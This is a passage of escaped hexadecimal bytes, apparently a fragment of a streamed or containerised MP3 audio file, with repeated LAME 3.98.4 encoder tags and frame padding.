A1\xF4\x04\x38\xAD\x58\x21\x2B\xFD\xAA\xD5\x7D\x8F\xF3\xD2\x79\x76\xF4\xF8\x1F\xFC\x90\xBB\xDA\x3D\x57\x2D\xD2\xF8\x23\x75\x87\x7A\xAA\x9B\xBE\xB5\xCA\xC1\x0E\xA8\x85\xD5\x54\x23\x0B\xF8\x73\x7A\x6F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xE0\x00\x00\x00\xBA\x08\x00\x01\xA3\x00\x02\x25\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xA8\x26\xB5\x01\x22\x03\x7B\xBB\x4C\x00\x00\x03\x48\x00\x00\x00\x00\x39\x92\x42\x39\x9F\x25\xA1\x85\xE0\x89\x31\x1A\x6E\x72\xA6\x54\x1A\x60\xC3\xC6\x30\x2C\x64\x92\x86\x9A\x78\x20\x0B\x0B\x22\x81\x43\xCD\x48\x4C\x78\x94\xC9\x44\x4C\x94\xEC\xAA\x24\x69\x22\xC0\x92\x52\x51\xE3\x4E\x14\x02\x29\x0D\x2B\x83\x9F\x4C\x25\x58\x04\x44\x3C\x7E\x61\x0D\xE6\x7A\x46\x61\x60\x26\xBE\x5C\x65\xC5\x48\x94\xBF\x8C\x34\xC0\x0C\x4C\x61\x22\x2E\x08\x04\x09\xB3\x3B\x70\x62\xB0\x2C\x33\x7E\xBE\x5E\x75\xA2\xC7\x1F\xE8\x75\xCC\x8E\xB1\x3E\x37\x69\xC9\x55\xEA\xEC\x9A\x89\x85\xC3\xA8\xD4\xFE\x5B\x8E\xBB\x54\x2F\x14\x5A\x05\xFF\xFF\xF5\xAB\xBF\x6D\x2E\x5A\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x03\xD0\x3A\x2F\x99\x71\x1D\x98\x92\x2B\x19\x4A\x25\x18\xE0\x7F\x1B\xBC\x26\x1A\x01\x33\x9C\xDE\x20\x1A\x58\x23\x18\xC4\x4A\x98\x36\x3B\x19\x86\x2E\x18\xCC\x17\x1A\x4E\xFC\x18\x22\x29\x19\xCC\xF2\x64\xE1\x31\xA4\x53\x06\xCF\x46\x98\x24\xDA\x7B\xF1\x69\x8D\xC6\x46\xA6\x30\x92\xC1\x0C\xA0\x10\x03\x67\x4D\x0A\x36\x30\xDB\xFC\xD1\x25\xB3\x05\x9E\x0D\x80\xC0\x37\x90\x9C\x18\x85\x30\x79\xEC\x23\xA6\x18\x1B\x08\x34\x01\x83\x26\x18\x08\x18\x11\x14\x24\x62\x38\x81\xE8\xD9\xA1\x83\x1C\xA0\x4D\xB2\x28\x21\x17\x86\x1D\x4C\x12\x14\x02\x86\xC8\x87\xC1\x00\x03\x1F\x81\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x02\x3F\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x8C\x23\x3D\x03\x28\x03\x77\x9B\x4C\x00\x00\x03\x48\x00\x00\x00\x00\x8C\x54\x04\x32\x30\xE0\xC0\xA1\x13\x04\x88\x0C\x10\x32\x31\xC9\x7C\xC1\x61\x43\xB6\x8B\x01\xC6\x44\x7C\x4C\x76\x2D\x2C\x6C\x42\x06\x2E\x40\xA0\x46\x40\x26\x65\x24\xA5\x80\x83\x22\x35\x30\xF0\x83\x1A\x22\x04\x09\xA8\xB9\x96\x80\x02\x80\x0C\x10\x28\xC3\x01\x8D\x1C\x30\xCE\x00\x07\x0C\xCC\x94\x34\xC8\xCA\x4C\x3C\x15\x41\x06\x83\x0C\x04\x40\x38\xDD\x0B\x15\x19\x7E\xD4\x6C\xBF\x30\x5B\x49\x94\xB9\x36\x61\xDB\x90\xB9\x97\xCE\x4A\xDC\x22\xBC\x7E\x2D\xC3\x76\x73\xF9\xB7\x26\xC4\x7E\xD4\xA5\x8C\x5A\xAB\x2B\xD3\xCB\x2E\x81\xFB\xFF\xFF\xFE\x2D\x20\x66\xEA\x4D\xA1\xBF\xD5\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x02\x80\x60\x70\x01\xA3\xAE\x00\x23\xF1\xB6\x0C\x26\x05\x7F\x0D\x21\x0D\x6D\x44\x01\x86\xCD\x72\x33\x32\x08\xC0\xCA\x07\xA3\x06\x0F\x8C\x0C\x23\x0A\xAD\xCC\x60\x16\x34\x62\x62\x55\x03\x3C\x08\x0E\x0F\x34\xD6\x53\x18\xCC\x31\x72\x53\x9F\x33\x31\xF7\x03\x4C\x01\x35\x32\xD3\x52\x46\x34\xF1\xE3\x37\x5F\x0A\xA9\x9C\xEB\x71\x8C\x08\x98\x38\x18\x24\x68\x8A\x4C\xCE\x89\x8B\xD0\x65\x26\x46\x0E\x0A\x65\x94\xA6\xB6\x70\x70\x0C\x66\x2C\x6A\x61\x25\x00\x00\x01\xAE\x09\x00\x00\xC2\x00\x02\x59\x00\x00\x00\x00\x22\x00\x00\x84\x26\xB1\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xE3\xC1\x50\x1F\x4D\x8E\x3F\xDF\x58\xDF\xBF\x12\xCA\xEA\xEF\xFF\xFC\x0D\xFF\xB9\x41\x80\x35\x06\x00\x38\x18\x00\xF0\x41\x06\x01\xBD\x5F\x81\x05\x47\xFE\xA9\x52\x90\x84\x3E\x57\x66\x0F\xD5\xF7\x65\x3F\xFB\xF8\x5C\xAC\xBC\x7D\x54\x97\x7E\xF9\x25\xB2\x8C\xA0\xC2\x18\xFA\x89\x65\xD5\x54\xFD\x55\x57\x73\xE0\x94\x3F\x82\x50\x97\xE2\xFB\xE8\xAE\x41\x12\x9A\x0A\xE6\x60\xE0\x3D\xF8\x30\x0C\x54\xB8\x21\x97\x04\x3A\x3F\x00\xE1\x28\x20\x40\x85\xF5\x03\xEF\x97\x64\xBF\x19\x89\x25\xE1\x04\x4B\x1F\xF0\xBC\xBE\xFC\x84\xB8\x4A\x1F\x51\xF1\x70\xF2\xFE\xFE\x93\x84\x10\x82\x25\xF8\x4B\x1F\xD2\xF5\x4A\xA2\xA9\x58\x86\xBF\xFF\xF7\x61\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF0\x00\x00\x00\xCD\x08\x00\x01\xA3\x00\x02\x59\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x6E\x1F\x6C\xFD\x30\x03\x73\x7A\x4D\x00\x00\x03\x48\x00\x00\x00\x00\x27\x00\x14\x61\xC3\x46\x14\x06\x80\x60\xC2\xB5\x31\x26\x3E\x30\x81\x74\xB2\x0B\x82\x18\x98\x30\xB1\x89\x81\x83\x98\x41\x69\x9C\x60\x65\x86\x88\xC4\x95\x40\x19\x22\xA2\xC1\x04\x97\x13\x8C\x31\xE1\x8C\x68\x43\x16\x28\x28\x48\xD1\x9F\x5D\xE1\x51\x0A\x54\x0A\x04\x2C\x14\x64\xE1\x70\x02\xC2\x86\x45\x03\x08\x98\x81\x43\xC6\x88\x9C\x29\xF3\x36\x35\x07\x50\xAC\xBA\xC8\x2C\xE4\x2D\xB7\xFA\x96\x03\xA6\x86\xE8\xE1\x9D\x48\x68\x2E\x55\x97\x42\x6B\xF6\x45\xF7\xA8\xF0\xFA\x4E\xE5\x9C\x72\xB5\xFF\xB3\x18\xBD\x19\x03\x7F\xFF\xF9\x16\x26\x18\x15\x32\x38\xAB\x04\x50\xF2\x82\xEA\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x02\x80\x0C\x01\xCC\xC3\x16\x8C\xEA\x21\x8C\x03\x1E\x0C\x4A\x23\x0C\x61\x12\xCC\x6E\x97\x0C\xAE\x18\x8C\x16\x01\x0C\x1D\x14\x0C\xE0\x0A\xCC\x26\x0A\x43\x03\xEF\x03\x05\x00\x60\x5C\x65\xA0\x26\x1A\x54\x60\xA3\x66\x28\x2E\x65\x09\xE6\x81\x7E\x69\x69\x28\xF8\x63\xA7\xA0\xE3\x03\x74\x1C\x36\x31\x13\x9B\x25\x31\x01\x73\x1D\x7E\x33\x04\xC3\x0D\x29\x30\xC2\xE3\x0F\x1D\x06\x1B\x99\x01\x88\x24\x40\xC0\x40\x86\x93\x4C\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x02\x73\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x67\x1E\xA0\xFF\x32\x03\x77\x79\x4D\x00\x00\x03\x48\x00\x00\x00\x00\x18\x14\xC2\x4E\x4D\x9C\xC8\xC6\x00\x0C\xF8\x48\x44\x1A\x5E\x13\x17\x17\x31\x60\x32\xA0\x71\x83\x03\x19\x40\x62\x44\x81\x46\x41\x21\xA0\x41\xC3\x01\x1F\x30\x10\x50\xE0\x80\xA9\x42\x54\x01\x81\x07\x0E\x1A\x20\x45\x48\x13\x32\x48\x12\x4C\x14\x81\x08\x62\x87\x2C\x73\x2C\x60\xB0\xC6\x28\x08\x33\x0F\x28\x6A\x6A\xAD\x41\x1B\x5C\x03\x1C\x8D\xC0\xA9\x88\x08\x35\xC0\x07\x12\xF3\x0B\x08\xEB\xB1\x17\xC7\x51\x77\x5A\x56\xFB\xE7\x0C\x5C\xA9\x3F\x2D\xCE\x8F\x1C\x63\x5F\xC9\x9A\x7B\x18\x56\xA9\x77\x3A\x3A\x92\x9E\x48\x6E\x63\x2E\xFF\xFF\xFF\xD2\xB3\xE9\x07\x49\xC6\x00\xCF\x9A\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x0C\x0C\x0A\x1E\xCC\x34\xBC\x41\x49\xA9\x95\x8D\x39\xA9\x4B\x09\x9F\xE2\x11\x89\x7D\x91\xCE\x01\x59\x9C\x49\x21\x85\x43\xE1\xB2\x61\xC9\x8E\xA6\x99\x86\x83\xC0\x5D\x4C\x14\x0D\x0C\x21\x33\xC2\x0E\xE3\x10\x80\xD3\x07\x4C\xE3\x08\x8C\x63\xC0\x85\x50\x82\x08\xD2\x11\x14\xC0\x32\xC4\x58\x0A\x33\x24\xDA\x32\x08\x92\x30\xEC\xA7\x32\x20\x2A\x32\x38\x6F\x0C\x1D\xCC\x61\x03\x0C\x5A\x04\x8C\x33\x08\x8C\x17\x20\xCC\x4E\x0D\x4C\x86\x12\x0C\x18\xC5\x90\xE0\x4C\x2C\xAA\x73\x1C\x80\x33\x02\xC0\x80\xA8\x56\x2C\x4F\x18\x0C\x00\x98\xE8\x00\x00\x01\xAE\x08\x00\x01\xA2\xE0\x02\x8D\x00\x00\x00\x00\x2B\xFF\xF3\xC0\x64\x83\x21\xE8\xFF\x28\x02\x77\xBA\x4D\x00\x00\x03\x48\x00\x00\x00\x00\x0E\x98\xC8\x19\x04\x05\xE6\x19\x83\x46\x01\x00\x06\x0F\x8B\x86\x21\x85\xEB\x60\xC4\x10\xA0\x0C\x29\x90\x81\x23\x01\xB9\x9A\x86\x6D\x8B\x98\x67\xE6\x10\x88\xA0\x43\x58\x5C\xC6\xA0\x34\x42\xC0\xCD\x17\x10\x10\x81\x71\x01\x42\x15\x8D\x56\x19\x22\xC0\xD3\x40\xA0\x02\x80\x8C\x00\x30\x10\x50\x81\xA6\x00\x71\x9D\x22\x35\x9C\x14\x44\xC7\x8D\x10\x14\x03\x02\x2D\x21\x97\x38\x02\x0A\x91\xE9\x0C\x9C\xB0\xFB\x3C\x60\xD1\x68\xFB\x1D\x9A\x77\xDE\xD8\x73\x1E\x49\x29\xEE\xD1\x7C\xAE\x3F\x39\x32\xFB\xD3\xC0\xB1\x99\xB7\x61\x97\x4D\xBB\x51\xBA\x78\xCE\x7F\xFF\xFF\xFF\xFA\xAA\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x02\x00\x1C\x01\x19\x9C\x0B\x98\x7A\x83\x9E\x4A\x70\x19\x72\x57\x98\x74\x13\x99\xCB\x0E\x9B\x58\x53\x99\xBA\x3F\x9A\x8C\x57\x9C\xE6\x16\x19\x10\x36\x99\xF2\x1A\x98\x7D\x40\x99\xFE\x3A\x99\x1A\x4D\x18\xB0\x20\x86\x54\x66\x1A\x0A\x06\x58\x82\xA7\xE6\x8A\x66\x87\x8C\x46\x7A\x0E\x86\x5B\x0B\xC5\x05\x59\x87\xE0\xA9\x85\x41\xB1\x81\xE4\x60\xA0\x70\x42\x1A\x18\x2C\x29\x98\x3C\x10\x98\x0E\x02\x98\x18\x1E\x99\x86\x46\x18\x42\x07\x98\x30\x0B\x98\xB2\x2F\x86\x0A\x26\x24\x89\x26\x13\x81\xA0\xD0\xB4\xC9\xC1\x78\x20\x3C\x25\x0E\x87\x86\x81\x20\xD8\x48\xD2\x30\x78\x36\x30\x98\x00\x00\x01\xAD\x09\x00\x00\xD5\x00\x02\x9B\x00\x00\x00\x00\x22\x00\x00\x84\x2A\xB1\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xE3\xF3\xE0\x65\xFE\xFE\xFE\xEA\xC0\x01\x80\x2C\x06\x01\xB8\x4B\x00\xE8\x01\xFF\x1E\x09\x1E\x57\xE5\x23\xEF\x17\xD9\x2A\xBF\x31\x5B\x74\x17\xCB\xD5\x2A\x03\x7F\x9E\x23\x7E\x54\x3E\x2F\x2F\x03\x5E\xBF\xC2\x60\xB1\x8F\xCB\xC7\xCA\xC4\xA5\x7F\x2E\x1F\xCC\xFF\xAD\x76\x1D\xDE\x5C\xBC\x7F\xFF\xFC\x6C\x06\x6E\xD6\xDC\x07\x1F\x93\xF5\x57\xFC\xAE\x75\x45\x9F\x9A\x49\xB8\x08\x20\xC0\x2C\x03\x00\x1E\x0C\x03\x78\x20\x02\x07\x8B\xFC\x25\x89\x02\x58\x40\x2E\xF1\x71\x7C\xF5\x93\xCA\xD4\x46\xFC\xEF\xDF\xE3\x90\x63\xF0\x84\x5C\x24\xE5\x56\x61\xF0\x48\x00\xF2\xF0\x85\xA0\x79\x97\x05\xBC\x10\x41\x80\x73\x08\x70\x03\x42\x1F\xC7\xF2\x66\xF2\x44\xCE\xC9\x3D\xE9\xE8\xD3\xAF\xFF\x7F\xFB\xFA\xDB\xFF\xFF\xEE\x06\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x00\x00\xE0\x08\x00\x01\xA3\x00\x02\xA7\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x8E\x23\x75\x01\x2A\x03\x77\xBA\x4D\x00\x00\x03\x48\x00\x00\x00\x00\x2F\x0B\x00\x00\x80\x34\xC1\x20\xB0\x38\x30\x30\x48\x1B\x80\xC6\x00\x43\x11\x01\xF2\x3A\x62\x8D\x41\xEF\x8D\x72\x00\x03\x33\x23\x0C\xE0\xA0\x0E\x24\x0A\x4E\x20\x50\x05\x22\x0C\x0A\x9C\x46\x14\x60\xCC\x81\x18\x53\x06\x90\xC1\x11\x30\xA0\x82\x84\x0E\x6D\xF2\x2E\x6A\xEC\xC5\x5C\x31\x84\x40\xA0\x20\x21\x24\x66\x04\x00\x58\x19\x89\x1A\x34\x3C\xC2\x83\x4F\x35\x52\x47\x04\xC0\x67\x12\xF8\x6D\xD8\x72\xE0\x68\x61\xFB\x8F\x3B\x0F\x94\x05\xC9\x5C\xCD\x6B\x4F\xC4\x9E\xC4\x66\x5D\x4F\x47\x52\x35\x1B\x91\xC0\xF5\xBB\x77\x2F\xFF\xFF\x87\x90\x51\xE7\xE7\xCE\xB4\x79\xB2\xAB\x55\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x0C\x00\x80\xFC\x14\x2C\x43\x0C\xA1\x33\x34\xDA\x1C\x43\x07\x70\x54\x31\x0E\x0C\xD3\x12\x11\xDF\x0A\x03\x19\x81\x70\x8E\x98\x5F\x93\x19\x97\x70\x78\x18\x98\x05\x31\x81\xB8\x94\x98\xD8\x04\x11\x8E\xC8\x8B\x18\x54\x0C\xE9\x82\xB8\x25\x18\xF6\x81\xF1\x83\xB8\x7E\x98\x30\x0B\xA9\xA6\x30\xB0\x18\x4B\x01\xE9\x84\x48\xAD\x98\x78\x85\xD1\x80\x18\x70\x18\x2A\x08\x50\x30\x65\x4C\xD4\x86\x14\xC0\x9C\x19\x0C\x23\x00\x28\xC3\xF4\x8E\x8C\x46\x82\x08\xC1\xC0\x0D\x84\x85\xCC\xC3\x38\x13\x0C\x00\x81\xC4\xC0\x3C\x06\x0C\x21\x47\xA8\xC3\xB0\x03\xCC\x09\x02\xD8\xC4\x48\x63\xCC\x77\xC3\x3C\xC1\x9C\x0D\xCC\x22\x42\x00\xC3\x70\x00\xCC\x00\x80\x54\x70\x06\x4C\x18\xC0\xD4\xC0\xE0\x07\x03\x83\x50\xC0\x0C\x19\x0C\x09\xC2\xA4\xC1\xCC\x2B\x8C\x08\x42\x48\xC4\x04\x3E\x8C\x0F\x42\x40\x46\x04\x66\x02\x00\x94\x1A\x3C\x73\x62\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x02\xC1\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xC9\x2A\xC9\x03\x24\x02\x7B\xDB\x4D\x00\x00\x03\x48\x00\x00\x00\x00\xC6\x57\x84\x0C\xFD\x34\xE5\x73\xCE\x4C\x3D\x28\x63\xB5\x1D\x5E\x83\x47\x86\x53\x74\x01\x57\x03\x41\x9C\x0D\x71\x8D\x19\x09\x21\x00\x02\x4C\xD0\x30\x0A\x54\x62\x65\xA1\x92\xA6\x70\x2A\x60\xA2\x66\x2E\x08\x59\x53\x07\x46\x12\xB6\x0C\xCD\x02\x1C\x9A\x11\x18\xB4\xE0\x50\xC0\xC8\x81\x80\x06\xC6\x72\x0A\x61\xA1\xA1\x61\xC3\x08\x1B\x74\x80\xA0\x68\x2E\xDB\x18\x38\x00\x10\x0D\x71\x17\x50\x20\x49\x3B\xDC\x32\xDE\x3E\xAC\xF1\x8D\x27\xA2\xB9\x44\x07\x9D\x8D\x0E\x80\x2D\xA5\x14\x60\xA8\x49\x68\x2F\xC3\xBA\xB9\xA7\x30\x53\xDC\xFF\xFF\xEB\x53\xEE\x20\x4E\xD4\x5C\xB5\x81\x15\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x02\xD6\x42\x04\x1A\x2A\xC6\x99\x98\x74\x9D\x67\x19\x98\xDA\x54\x1A\xC8\x3B\x98\x0B\x3D\x9C\x82\x4A\x99\xC2\x6C\x98\xB2\x69\x1D\x80\x24\x99\x0A\x54\x01\x84\xB3\x3B\x28\x23\x27\xC0\xA0\x08\x3E\x63\xE0\x48\x06\x34\xCC\x51\x07\x8C\x79\x03\x8D\x9F\x88\x8D\x32\x03\x0C\x82\x4E\x11\x39\x4D\x7E\x5D\x31\x31\x0C\xD6\x93\x13\xE1\xD1\x0D\xC8\x00\x31\xB8\xE4\x49\x8A\x50\xCD\x1E\x91\x98\x58\x2E\x62\x43\x19\x8E\xC5\x66\x19\x25\x99\xF8\x20\x0E\xBE\x18\xE0\xC2\x63\x57\x71\xA5\x53\x06\x0A\x06\x19\xAC\xD8\x67\xB2\xF1\x87\x87\x45\x01\xF1\x10\x50\x04\x99\x31\x38\x90\xC0\xE5\x23\x20\x92\x0C\x1A\x3D\x12\x1C\x18\xE8\x82\x64\x21\x01\x20\x10\x2A\x4C\x19\x0A\x18\xA8\xBE\x44\x13\x32\x38\x98\x14\x22\x19\x25\x98\xDC\xDC\x18\xE6\x53\x73\x1F\x8C\xCC\x20\x57\x12\x20\x00\x00\x01\x72\x59\x08\x24\x68\x46\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x02\xDB\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xC3\x2A\x11\xD3\x2A\x03\x77\x8D\x6F\x00\x00\x03\x48\x00\x00\x00\x00\x08\x1B\xBA\xC0\x10\x31\x88\xC4\x06\x1C\x1F\xAD\x11\x10\x98\xC1\x63\x93\x04\x82\x8C\x34\x16\x30\xE8\x38\x20\x32\x61\xE0\xC1\x88\x41\x86\x0C\x0F\x18\x28\x0C\x3C\x25\x80\xD3\xD0\x40\x14\x41\xF9\x02\x19\x2A\xA2\x35\x8F\x06\x00\xCA\x07\x30\x92\x0E\x50\x90\x94\xC2\xA6\x23\x43\x90\x14\xA1\x30\x0E\x68\x99\x8F\xA1\x3E\x18\xA1\x7C\x05\xBC\x61\xCB\x85\xA3\xC8\x4C\x04\xF0\xA6\x41\x38\x67\xFF\xFF\xFF\xFF\xFE\x64\xEB\x73\x29\xAE\x62\x91\xA1\xD3\x04\xCE\xA0\x92\x69\xD6\x82\x34\x14\x79\x68\x20\xEC\x9A\x76\x37\x4D\xD9\x49\x1D\x42\xE6\x8A\x7D\x05\xA4\x92\x69\x25\x45\x9C\x92\x65\x21\x84\x00\x26\x99\x00\x20\x99\x89\xD9\xB7\x9B\xEF\x50\x31\x99\x81\x00\x18\x31\x06\x59\x88\x70\xBF\x1D\xAD\x85\xD9\x98\x01\x3C\x98\x0F\xB8\xF1\xB9\x8B\xC8\x98\xAB\x1B\x81\x87\xF1\x50\x9C\x22\xA8\x99\x85\xF8\xEC\x98\x53\x90\x01\x90\x39\x71\x18\x76\x0B\xC9\x90\x80\x96\x98\x48\x1B\x39\x84\x97\x20\x98\x98\x10\x79\x95\x78\x9F\x99\x12\xA0\x29\x84\x51\x02\x98\x9D\x1A\x11\x8B\xA1\x11\x9A\xFA\x1A\xF9\x9A\x60\x5B\x18\x6D\x8A\x18\x10\x51\x4C\x29\xC2\xD0\xC3\x5C\x64\x8C\x82\x83\x90\xD7\xB4\x55\x0C\x8C\xC8\x68\xC2\x94\x1A\x4C\x7A\x05\x44\xC5\xA0\x40\x0C\x45\xC1\x64\xD0\x0A\x2E\x8D\x56\x4E\x2C\xC4\x78\x5E\xCC\x9A\xCB\x1C\xC4\x90\x89\x83\x89\xB8\xC0\xF8\x5B\x8C\x66\x81\x9C\xC2\xB8\x31\x8C\x3E\x80\x60\xC2\x00\x26\xCC\x54\x04\x90\xC5\x18\x3F\x0C\x4A\xC7\xB4\xC8\x08\x7C\x4C\x28\x01\x8C\xC1\x98\x11\x8C\x12\x83\x4C\xCC\x34\xB0\xD7\xC1\xC0\xCE\x7A\x8C\xC8\xAC\x08\xC2\xC7\xE0\xD2\x34\x44\xDC\x80\xA0\xC4\xA1\xEC\xC9\x93\xA8\xCF\x24\xC8\xCA\x71\x98\xC5\xF3\x50\x39\x3E\x31\xEC\x03\x31\x14\x63\x31\xB4\x80\x30\x78\x4E\x33\xBC\x0D\x00\x00\x01\xAE\x09\x00\x00\xC3\x00\x02\xDE\x00\x00\x00\x00\x22\x00\x00\x84\x2E\xB1\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x85\xFB\xB3\x92\x0D\x6E\x52\x4F\xFF\xFD\xE0\x64\x0F\xE1\x06\x00\x40\x18\x02\xA1\x22\x83\x00\x22\x5C\x0C\x03\x78\x30\x0D\xA1\x06\x89\x1E\x12\x54\x82\x12\xA9\xED\x35\xEC\x0C\x03\x78\x20\x03\x01\x1A\x25\x81\xE9\xF1\xE9\x77\xF7\xE3\xE5\x79\x8A\x55\x13\xF4\xAA\x06\x01\x60\x03\xC1\x80\x91\x12\x81\x80\x12\x1F\xAA\x1F\x09\x62\x40\x91\xB4\xBA\xFD\x56\x97\xCD\xBB\xDF\x93\x7C\x02\x08\x20\xAB\x04\x12\xF8\x5E\xAF\x26\x45\x1E\xF4\x99\x3C\xE8\x61\x2B\xC0\x1F\x0B\xCB\xE8\xFE\xFA\xAA\xB6\x8F\x24\xA6\x1E\x84\xBF\x80\x75\x12\x8B\xA0\x95\x15\x82\x86\x60\x1F\xB6\x1C\xFF\xFF\x8F\xDC\x19\xFF\x7F\x7F\x7F\x7F\xFF\xB2\x0A\x2B\x3F\x58\x75\x20\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF0\x00\x00\x00\xCE\x08\x00\x01\xA3\x00\x02\xF6\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xFF\x32\x89\x05\x14\x01\x7B\xDD\x4C\x00\x00\x03\x48\x00\x00\x00\x00\x33\x5C\x5D\x30\xEC\x12\x31\x95\x44\x30\xF8\xA4\x32\xC0\x21\x31\xB0\x21\x32\xB8\x2F\x32\x34\x18\x32\x5C\x51\x37\x4C\x9C\x35\xB4\x9F\x31\x14\x73\x33\x2C\xE2\x32\x4C\xD9\x33\x84\x25\x32\x3C\xD0\x11\x99\xC6\x2